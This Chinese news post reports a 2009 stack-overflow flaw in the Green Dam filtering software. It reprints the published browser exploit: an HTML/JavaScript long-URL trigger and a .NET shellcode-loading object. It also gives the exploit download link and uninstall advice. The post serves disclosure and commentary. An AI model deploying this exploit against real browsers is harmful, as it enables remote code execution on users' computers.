近日，密歇根大学研究人员发布了“绿坝-花季护航”栈溢出漏洞分析报，原因是绿坝软件使用固定长度的缓冲区来处理网址，因此如果长度超出处理范围便会出现缓存溢出，黑客可以利用它将浏览器定向到有恶意代码的网站。

　　就在“绿坝-花季护航”高危漏洞公布不久，黑客 seer[N.N.U] 在 milw0rm.com 上发布了利用该漏洞的攻击代码，可导致浏览器崩溃。

Green Dam remote buffer overflow exploit

"Green Dam" is a software used for monitoring and anti-pornography, popularizing by
Chinese goverment. After July 1st, it will be forced to install on all new Chinese PCs.
Now it already has 50 million copies in China.
In order to monitor the URL that user is exploring, Green Dam injected the browser
process. When Green Dam is trying to handle a long URL, a stack overflow will occur in the
browser process.
This exploit can be used for exploitation on IE, on those computers installed Green Dam.
I used the .net binary to deploy shellcode, for it`s more stable than Heap Spray, and able
to bypass DEP and ASLR on Vista.
The exploit page contains a .net control, so it should be published on IIS.

“绿坝-花季护航”溢出漏洞攻击代码：

<html></p> <p><head><br /> <script><br /> function x()<br /> {<br /> var url='';<br /> for(var i=1; i<=2035; i++)<br />  url += '$'; // '$' = 0x24, eip = 0x24242424, hum?;-)</p> <p>window.location=url + '.html';<br /> }<br /> </script></p> <p></head></p> <p><body></p> <p><object classID="exploit.dll#exploit.Shellcode"></object><br /> <!--Deploy shellcode in browser process at base address 0x24242xxx--></p> <p><input type="button" value="fire" onclick="x()" /><br /> </body></p> <p></html>

“绿坝-花季护航”栈溢出漏洞攻击代码下载：http://milw0rm.com/sploits/2009-green-dam.zip

临时防范方法：
1、关闭“绿坝”过滤监控功能
2、卸载“绿坝”（可利用专用卸载工具）

　　漏洞曝了，攻击代码公布了，这次“国家的4000W扶持”算是失败了。大多数网民都不接受，更重要的是“绿坝”这东西被一家叫Solid Oak Software的美国软件公司指控其盗用该公司CyberSitter软件的编码，有趣的是“绿坝”竟然通过Solid Oak的服务器更新黑名单~~~不知道7月1日正式预装那天意味着什么...